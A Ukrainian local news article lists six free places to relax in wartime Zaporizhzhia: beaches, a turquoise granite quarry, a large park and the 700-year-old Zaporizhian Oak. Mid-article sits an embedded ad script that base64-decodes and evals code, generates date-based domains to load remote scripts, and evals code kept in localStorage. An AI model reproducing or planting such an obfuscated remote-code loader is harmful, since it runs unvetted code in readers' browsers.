«Блакитна лагуна», парки і пляжі: ТОП-6 місць безкоштовного відпочинку у Запоріжжі під час війни

В умовах війни, коли більшість туристичних локацій та курортів Запорізької області недоступні через заборону відвідування або тимчасову окупацію, люди шукають інші варіанти відпочинку, який, як вважають експерти, для багатьох іноді є вкрай необхідним в умовах постійного стресу.

Журналісти Акценту підібрали ТОП-6 безкоштовних та цікавих місць відпочинку та туризму в місті Запоріжжі під час воєнного стану.

Пляжі на березі Дніпра

Офіційно пляжний сезон у Запоріжжі все ще не відкрили: ще 7 квітня було заборонено відвідування зон відпочинку на заповідному острові Хортиця. Тоді ж, було заборонено відвідувати прибережні зони водойм, зон відпочинку та парків, розташованих у межах природно-заповідних зон та лісових масивів.

Водночас, як раніше інформував раніше Акцент, офіційних заборон на відвідування пляжів міста немає. Хоча й іноді правоохоронці влаштовують рейди з метою проведення інформаційно-роз’яснювальної роботи, це не зупиняє запоріжців від відвідування пляжів, засмагання на піску і купання в воді.

Всього у Запоріжжі є два офіційних пляжі: Центральний та Правобережний.

Центральний пляж. Фото з відкритих джерел

Центральний (або Жданівський) пляж — найпопулярніший та найдоступніший для мешканців Запоріжжя. Він знаходиться в центральній частині міста — у Вознесенівському районі.

Правобережний пляж. Фото з відкритих джерел

Правобережний пляж — пляж у Дніпровському районі Запоріжжя, який був реконструйований у 2020 році.

«Можна з повним правом сказати, що тут фактично збудували новий пляж, який відповідає європейським вимогам», — так описали його відкриття у Запорізькій міськраді.

Також, у місті чимало неофіційних пляжів. Один з таких — пляж «Островок», розташований у Південному мікрорайоні Запоріжжя на березі річки Дніпро.

Неофіційний пляж «Островок». Фото: Акцент

Як вже повідомляв Акцент, ця зона відпочинку користується популярністю серед мешканців Комунарського та Олександрівського районів Запоріжжя, проте не має офіційного статусу. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Передаточний кар’єр

В Запоріжжі є унікальне місце, яке має назву Передаточний кар’єр: за неймовірно красивий бірюзовий колір води місцеві жителі ще називають його Блакитною лагуною. Заснований у 1929 році кар’єр колись був одним із найбільших із видобутку граніту в Україні.

Передаточний кар’єр. Фото: Сергій Богачов

У кар’єрі водиться чимало риби, тож запорожці доволі часто приходять сюди на риболовлю, та й просто помилуватися краєвидами. Знаходиться він у колишній промзоні міста неподалік траси «Харків-Сімферополь».

Дубовий гай

Парк культури і відпочинку «Дубовий гай», який у просторіччі називають «Дубовка» — це найбільший і найстаріший парк Запоріжжя, який ще й є одним з найбільш популярних у місті.

Парк «Дубовий гай». Фото з відкритих джерел

Розташований він в Олександрівському районі міста, поряд із затокою річки Мокра Московка. Окрім великої кількості атракціонів, кафе, спортивних та дитячих майданчиків запоріжці люблять просто гуляти алеями парку, розташованими під старими дубами, липами, кленами.

Запорізький дуб

Запорізький Дуб – національне надбання України та один із головних символів Запоріжжя. Могутнє 700-річне дерево, на якому залишилася лише одна жива гілка, захоплює своєю величчю, а місце — своєю спокійною атмосферою.

Запорізький дуб, літо 2021 року. Фото: Акцент

Дуб знаходиться на території історико-культурного комплексу, який відкрили у 2001 році в правобережній частині Дніпровського району Запоріжжя. На території є хатинка-мазанка й увіковічений у дереві Ничипор Дейкун — доглядач Запорізького дуба. Поряд з комплексом також розташована церква.

До слова, раніше Акцент робив огляд популярних розваг на воді та басейнів у Запоріжжі 2022.

Також, Акцент розповідав, який відпочинок на морі в Україні можливий у 2022 році. (adsbygoogle = window.adsbygoogle || []).push({});

Подписывайтесь на Акцент в ПІДТРИМКА САЙТУ АКЦЕНТ Источник: https://akzent.zp.ua/blakitna-laguna-parki-i-plyazhi-top-6-mists-bezkoshtovnogo-vidpochinku-u-zaporizhzhi-pid-chas-vijni/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top